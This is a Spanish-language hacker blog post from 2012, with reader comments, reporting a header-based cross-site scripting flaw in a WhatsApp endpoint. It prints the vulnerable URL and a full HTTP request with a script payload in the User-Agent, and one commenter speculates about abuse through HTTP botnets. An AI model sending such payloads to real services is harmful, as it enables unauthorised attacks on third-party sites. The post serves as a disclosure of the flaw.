Whatsapp XSS Headers [USER-AGENT]

Tecleado por Maztor On 08:48
Iniciando un nuevo dia, recuperandome un poco de mis bajas notas de la universidad... como habia comentado antes sobre mi tiempo de inactividad, hoy decidí divertirme un RATO para aprovechar esos 15 o 30 min sin nada que hacer... ¿Que mejor diversion que divagar en sitios buscando pequeños, basicos o avanzados XSS's ?

Pues bien no pasaron mas de 2:38 Min-Seg cuando ingrese a Whatsapp y note el lindo "detector" de USER-AGENT.

Pues como siempre tenemos ese instinto de "curiosidad" intentamos morir como le paso al pequeño gato curioso, en fin no somos gatos... Por experiencia conozco el tipico pensamiento mediocre de muchos programadores el cual consiste en dedicarle menos tiempo a lo "INTERNO" y que otros usuarios "no pueden ver"... Demasiado mediocre como descuidar Headers, Libs, filtros, etc; Nunca se sabe que tan rapido evoluvione un ataque y benificio XSS asi que segun mi opinion personal es mejor prevenir, aunque este no sea tan CRITICO y LETAL.


PoC 

Url Vulnearble: https://sro.whatsapp.net/client/iphone/iq.php?cd=1&cc=%3CA%3E&me=%3CB%3E&u[]=%3CC%3E
--------------------------------------------------------------------------------------------------
Host: sro.whatsapp.net
User-Agent: [Vuln XSS Simple] <script>alert('@Mazt0r Was Here!')</script> 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
----------------------------------------------------------------------------------------------------

Result



Nota: una vulnerabilidad basica y sencilla pero se presta para mucha diversion. (Si entienden a lo que me refiero).

                                               [Verguenza usar Windows :( --- Pero No tengo PC al momento]

Saludos y Happy Hacking!


edit post

4 Responses to 'Whatsapp XSS Headers [USER-AGENT]'

  1. GothicX said...
    http://maztor.blogspot.com/2012/11/whatsapp-xss-headers-user-agent.html?showComment=1354036296065#c8644241290130247184'> 27 de noviembre de 2012 09:11

    :D buena maztor ahi veremos que se puede hacer :3 un abrazo hermano!

     

  2. isseu said...
    http://maztor.blogspot.com/2012/11/whatsapp-xss-headers-user-agent.html?showComment=1354038341347#c1238497122217087099'> 27 de noviembre de 2012 09:45

    :o
    Lindo xss

     

  3. Anónimo said...
    http://maztor.blogspot.com/2012/11/whatsapp-xss-headers-user-agent.html?showComment=1354302654205#c1060418370159808819'> 30 de noviembre de 2012 11:10

    La cosa es que no es estático y al tener que hacerlo modificando el user agent no lo veo mucha utilidad...a ver si alguien puede sacarse algo de la gorra

     

  4. Luthary said...
    http://maztor.blogspot.com/2012/11/whatsapp-xss-headers-user-agent.html?showComment=1354471525026#c530421378051513798'> 2 de diciembre de 2012 10:05

    Yo si creo que tenga utilidad mediante las peticiones remotas arbritrarias, asi como las botnets http, peor ya eso seria un nivel avanzado xD || De todas maneras esta bueno el XSS.

     

Publicar un comentario en la entrada

Related Posts Plugin for WordPress, Blogger...
Sigueme en Twitter

Qr-c0de Url Blog

Suscribirse al blog

Ingresar Email

¡Recomendar! y RSS